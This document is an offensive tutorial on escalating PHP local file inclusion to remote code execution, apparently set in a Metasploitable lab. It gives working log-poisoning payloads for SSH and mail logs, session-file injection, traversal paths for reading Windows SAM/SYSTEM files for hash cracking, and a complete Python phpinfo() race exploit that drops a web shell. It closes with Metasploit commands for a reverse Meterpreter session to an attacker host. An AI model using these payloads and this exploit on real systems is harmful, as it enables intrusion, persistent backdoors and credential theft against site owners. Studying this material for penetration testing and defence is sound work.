RCE via Log Poisoning: Attack Methodologies
Some log files that are worth trying through an LFI parameter are the following:
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/auth
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
The included file is read with the web server's privileges, so a log is only usable if the account PHP runs as (typically www-data) can read it. On current Debian and Ubuntu systems auth.log and mail.log are created with mode 0640 and owned by syslog:adm (or root:adm), so they cannot be included there; the Metasploitable 2 target used below is an older image on which they are world-readable.
A reliable way to exploit a web application that suffers from local file inclusion (LFI) is to poison a log file that the application can include. Let us assume the target is Metasploitable 2 and the attacking machine runs Kali Linux.
The following steps show how to do this from Kali Linux:
Open a terminal and connect to the target over SSH with a valid account (the default Metasploitable 2 user is msfadmin):
ssh msfadmin@192.168.1.105
Check the permissions of auth.log first:
ls -l /var/log/auth.log
On this target the file is world-readable, which is what makes the attack possible: the web server user must be able to read whatever file it includes. The listing looks like this:
-rw-r--r-- 1 syslog adm ... /var/log/auth.log
Since the file is readable, follow it to watch new entries arrive:
tail -f /var/log/auth.log
Scroll through the entries and note the lines sshd wrote for the msfadmin login.
Now, from a second terminal, attempt to log in to the target with a username that does not exist:
ssh hacker@192.168.1.105
The login is refused:
"Permission denied, please try again."
Return to the auth.log output and confirm that the failed attempt was recorded: sshd logs the unknown username together with the client address. With the attacker at 192.168.1.104 the entry looks like this:
"Failed password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
So every login attempt, successful or not, is written to the log, and the attempted username is written verbatim. That is the injection point: supply PHP code as the username. Single-quote the payload so the shell passes the spaces, the quotes and the $ sign through untouched:
ssh '<?php system($_GET["c"]); ?>'@192.168.1.105
Make sure the code is valid PHP before sending it. Once the line is in the log it cannot be removed without write access to the file, and a syntax error in it makes PHP abort the include of the whole file with a parse error until the log is rotated.
Check auth.log again: the failed attempt is recorded with the PHP code as the username. With the attacker at 192.168.1.104 the entry looks like this:
"Failed password for invalid user <?php system($_GET["c"]); ?> from 192.168.1.104 port 49642 ssh2"
Assume an LFI-vulnerable page already exists on the target (lfi.php, which includes whatever path it receives in its file parameter) and browse to it:
192.168.1.105/lfi/lfi.php
Without a parameter it shows an include error, which is what a local file inclusion vulnerability typically looks like.
Now include auth.log through the vulnerable parameter:
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
The page dumps the log and, at the point where the poisoned entry sits, PHP prints a warning because the c parameter is empty:
"Warning: system(): Cannot execute a blank command"
(On PHP 8 the same situation is a fatal ValueError, "system(): Argument #1 ($command) cannot be empty", which confirms the code ran just as well.)
This means the injected PHP has been executed: the log entry containing the payload was parsed as code and system() was called with an empty command. From now on any command can be passed in the c parameter.
Browse to
"192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
and the page shows the contents of auth.log plus the output of ps, executed as the web server user. Likewise
"192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd"
shows the web server's working directory in the same window. The command output is mixed into the log dump; searching the page for it, or wrapping the payload's output in a distinctive marker, makes it easier to find.
Log Poisoning via Mail
The same idea works with the mail log. In this scenario the target runs Postfix and has port 25 (SMTP) open, found with a basic Nmap scan. The goal is to get PHP into the mail log so that it executes when the page with the LFI vulnerability includes the log. Sending a phpinfo() call is a good first test, but the end goal is to get this into the log:
<?php echo system($_GET["cmd"]); ?>
How does this string get into Postfix's mail.log? By default Postfix logs a timestamp, the client address, the sender and recipient addresses and some other basic data for each message and for each command it rejects. Use a mail client (mutt, the mail command) or plain telnet to send the victim mail. smtp-user-enum on Kali can also be used to check for valid users, as long as VRFY has not been disabled in the Postfix configuration.
Postfix does not log message subjects by default; it only does so when a header_checks rule is configured to WARN on the Subject header, so check the log before relying on the subject as an injection point. The field that is always logged is the recipient address, and Postfix records it even when it rejects the command, so that is what is used below.
The SMTP exchange over telnet looks like this:
telnet 192.168.1.107 25
Connect to the SMTP port and send the payload in the RCPT TO command. Postfix writes a log line for every message and for every rejected command, including the recipient address as it was received, so the PHP code sent as the recipient is appended to mail.log as a new entry:
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
This is the log poisoning step: the PHP code is now part of mail.log. Include mail.log through the LFI and pass a command in the c parameter; the page shows the log together with the command's output. For example, running ifconfig confirms that the command executes on the target and lists its network interfaces:
192.168.1.107/xyz/lfi.php?file=/var/log/mail.log&c=ifconfig
In some cases the payload can also be sent from the command line with mail, placing it in the Subject header (which only reaches the log if the target logs subjects, as noted above):
mail -s "<?php system($_GET['cmd']);?>" [email protected] < /dev/null
LFI to RCE via PHP sessions
Check whether the site uses PHP sessions (a PHPSESSID cookie):
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
PHP stores these sessions in files named after the session ID, by default under /var/lib/php5 on PHP 5 (on PHP 7 and later the default is /var/lib/php/sessions; session.save_path in php.ini gives the actual location):
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Every value the application stores in $_SESSION is written to this file verbatim. Here the user name is stored, so submit a login with PHP code as the user name:
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Then use the LFI (here the lang parameter, which the application includes) to include the session file:
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
LFI to RCE via phpinfo()
phpinfo() displays the contents of the request superglobals, including $_GET, $_POST and $_FILES. Whenever a file is uploaded to any PHP script, PHP stores it under a temporary name (shown in $_FILES as tmp_name) for the duration of the request and deletes it when the request ends.
By uploading a file to the phpinfo() script and reading the response while it is still streaming, with the request padded so that PHP flushes the part of the output containing tmp_name early, it is possible to learn the temporary file name and request the LFI script with it before the temporary file is deleted. It is a race, so it usually takes many attempts.
Use the script phpInfoLFI.py (available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py).
Research: https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
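The following is an added example, a simplified reimplementation of the idea in the Insomnia paper written for this page and not a copy of phpInfoLFI.py: it builds the padded upload request, extracts tmp_name from the phpinfo() output as it streams in, and immediately includes that path through the LFI, repeating in parallel until one attempt wins the race. The host, the phpinfo.php and lfi.php paths, the file parameter name and the marker string are assumptions.

```python
"""Simplified phpinfo()+LFI race (added example, not the Insomnia script).

PHP stages an uploaded file under a temporary name and deletes it when the
request ends. phpinfo() prints that name in its $_FILES dump. If we read the
name while the phpinfo() response is still streaming and include it through
the LFI before the request finishes, the staged file runs. Host, paths and
the parameter name used in __main__ are assumptions for illustration.
"""
import re
import socket
import threading

TMP_NAME = re.compile(r"\[tmp_name\]\s*=(?:&gt;|>)\s*(/\S+)")


def extract_tmp_name(phpinfo_output):
    """Pull the staged upload path out of phpinfo()'s $_FILES section (HTML or text)."""
    m = TMP_NAME.search(phpinfo_output)
    return m.group(1) if m else None


def build_upload_request(host, phpinfo_path, payload, padding=5000):
    """Raw HTTP/1.1 POST uploading `payload` as a file, with oversized headers.

    phpinfo() echoes the query string, cookies and headers, so the padding pushes
    the output past PHP's output buffer and the $_FILES part reaches us before
    the script ends and the temp file is removed."""
    boundary = "----lfiphpinfo"
    body = (f"--{boundary}\r\n"
            'Content-Disposition: form-data; name="dummy"; filename="x.txt"\r\n'
            "Content-Type: text/plain\r\n\r\n"
            f"{payload}\r\n--{boundary}--\r\n").encode()
    junk = "A" * padding
    head = "\r\n".join([
        f"POST {phpinfo_path}?{junk}=1 HTTP/1.1",
        f"Host: {host}",
        f"Cookie: PHPSESSID={junk}",
        f"User-Agent: {junk}",
        f"Content-Type: multipart/form-data; boundary={boundary}",
        f"Content-Length: {len(body)}",
        "Connection: close", "", ""])
    return head.encode() + body


def has_tmp_name(data):
    """True once the tmp_name line, including its end, has arrived."""
    i = data.find(b"[tmp_name]")
    return i >= 0 and b"\n" in data[i:]


def recv_until(sock, done, limit=1 << 20):
    """Read from sock until done(data) is true, EOF, or `limit` bytes."""
    data = b""
    while not done(data) and len(data) < limit:
        chunk = sock.recv(65536)
        if not chunk:
            break
        data += chunk
    return data


def race_once(host, port, phpinfo_path, lfi_path, file_param, payload, marker):
    """One attempt: start the upload, grab tmp_name mid-stream, include it at once."""
    up = socket.create_connection((host, port), timeout=10)
    try:
        up.sendall(build_upload_request(host, phpinfo_path, payload))
        tmp = extract_tmp_name(recv_until(up, has_tmp_name).decode("latin-1"))
        if tmp is None:
            return False
        req = (f"GET {lfi_path}?{file_param}={tmp} HTTP/1.1\r\nHost: {host}\r\n"
               "Connection: close\r\n\r\n").encode()
        with socket.create_connection((host, port), timeout=10) as inc:
            inc.sendall(req)
            return marker.encode() in recv_until(inc, lambda d: marker.encode() in d)
    finally:
        up.close()   # the phpinfo request finishes on its own; the temp file is gone by then


def race(host, port, phpinfo_path, lfi_path, file_param, payload, marker, attempts=200, threads=10):
    """Run race_once in parallel until one attempt sees `marker` in the LFI response."""
    won = threading.Event()

    def worker():
        for _ in range(attempts // threads):
            if won.is_set():
                return
            try:
                if race_once(host, port, phpinfo_path, lfi_path, file_param, payload, marker):
                    won.set()
            except OSError:
                pass   # connection errors are normal under load; just try again

    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return won.is_set()


if __name__ == "__main__":
    # Payload drops a persistent web shell and prints a marker so we know it ran.
    PAYLOAD = '<?php file_put_contents("/tmp/g.php", "<?php system(\\$_GET[\\"c\\"]); ?>"); echo "RACE_WON"; ?>'
    print(race("192.168.1.105", 80, "/phpinfo.php", "/lfi/lfi.php", "file", PAYLOAD, "RACE_WON"))
```

Because the included file runs only once before PHP deletes it, the payload's job is to write something persistent (here /tmp/g.php) and signal success; after a win, the dropped file is included through the same LFI like any other log.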
LFI to RCE via credentials files
This method requires that the account the application runs as has enough privileges to read the sensitive files through the inclusion.
Windows version
First extract the sam and system files:
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
Then extract the hashes from these files:
samdump2 SYSTEM SAM > hashes.txt
and crack them with hashcat or john, or replay them using the Pass-the-Hash technique.
Once command execution has been obtained through any of the methods above, a Meterpreter session can be spawned with Metasploit's web_delivery module, which serves a PHP payload and prints the one-line command to run on the target through the c parameter. Execute the following inside Metasploit:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set lport 8888
msf exploit(web_delivery) > exploit
Target 1 is the PHP target; lhost and lport are the attacker's address and listening port.